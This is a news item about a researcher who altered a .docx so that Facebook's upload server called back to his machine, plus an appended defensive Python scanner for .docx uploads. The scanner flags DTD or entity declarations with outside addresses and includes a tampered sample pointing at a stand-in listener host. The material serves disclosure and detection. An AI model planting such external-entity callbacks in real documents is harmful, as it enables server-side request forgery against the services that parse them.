February 4, 2015
A .docx file has the particularity of being a compressed archive whose internal contents can be modified once it is decompressed. That is why Ramadan took a random .docx and unzipped it (using the 7zip tool) in order to access its code and modify it. Specifically, he changed one line of code so that the Word document would always, wherever it was, communicate with a twin file hosted on the researcher's computer.
Good as the idea was, Ramadan was aware that things could go wrong. It was likely that, even if he sent the modified document to the server, the file would end up not communicating with the one left on his computer.
For this reason, before uploading the manipulated Word file to the Facebook server, he checked whether he could get any result by uploading the document to another server (specifically, one he had programmed himself for the occasion). The result was as expected: several minutes after the test, the external server he had just created was trying to communicate with his computer, so the Facebook server would do the same, and indeed it did.
Although the bug has already been fixed – and Ramadan has pocketed a reward of about 5,300 euros – its existence shows that compromising Facebook accounts is easier than it seems.
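An added example, not code from the original article or from Facebook: a check an upload handler could run on a .docx before any XML parser touches it, unpacking the archive the same way and flagging parts that declare a DTD or entity pointing at an outside address. It assumes the altered line was a declaration of that kind, which the article does not specify; `scan_docx`, `build_docx` and the sample host are made-up names.

```python
import io
import re
import zipfile

XML_SUFFIXES = (".xml", ".rels")     # package parts that hold XML
MAX_PART_BYTES = 20 * 1024 * 1024    # do not inflate parts larger than this
DECL_RE = re.compile(r"<!(DOCTYPE|ENTITY)\b([^<>]*)")   # assumed tamper marker
EXTERNAL_RE = re.compile(r"\b(?:SYSTEM|PUBLIC)\b(.*)", re.S)
LITERAL_RE = re.compile(r"\"([^\"]*)\"|'([^']*)'")

def _to_text(raw: bytes) -> str:
    """Decode a part without parsing it; honour a UTF-16 byte order mark."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8", errors="replace")

def scan_docx(data: bytes) -> list:
    """Return (part, reason) findings for an uploaded .docx; [] means nothing flagged."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [("<package>", "not a zip archive")]
    findings = []
    with archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith(XML_SUFFIXES):
                continue
            if info.file_size > MAX_PART_BYTES:
                findings.append((info.filename, "part too large to inspect"))
                continue
            for kind, body in DECL_RE.findall(_to_text(archive.read(info))):
                external = EXTERNAL_RE.search(body)
                literals = LITERAL_RE.findall(external.group(1)) if external else []
                # The system identifier is the last quoted literal of the declaration.
                target = "".join(literals[-1]) if literals else ""
                reason = f"{kind} -> {target}" if target else f"{kind} declaration"
                findings.append((info.filename, reason))
    return findings

def build_docx(document_xml: str) -> bytes:
    """Constructed sample package for the demo: a zip holding two XML parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()

CLEAN = build_docx('<?xml version="1.0"?><document/>')      # constructed samples
TAMPERED = build_docx('<?xml version="1.0"?><!DOCTYPE document SYSTEM '
                      '"http://listener.example.invalid/x.dtd"><document/>')
```

A flagged upload is best rejected outright, and the parser that later reads accepted files should still have DTD processing and external entity resolution switched off.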
via Beware of Facebook! A researcher has managed to hack it with a Word document – Media Center Spain.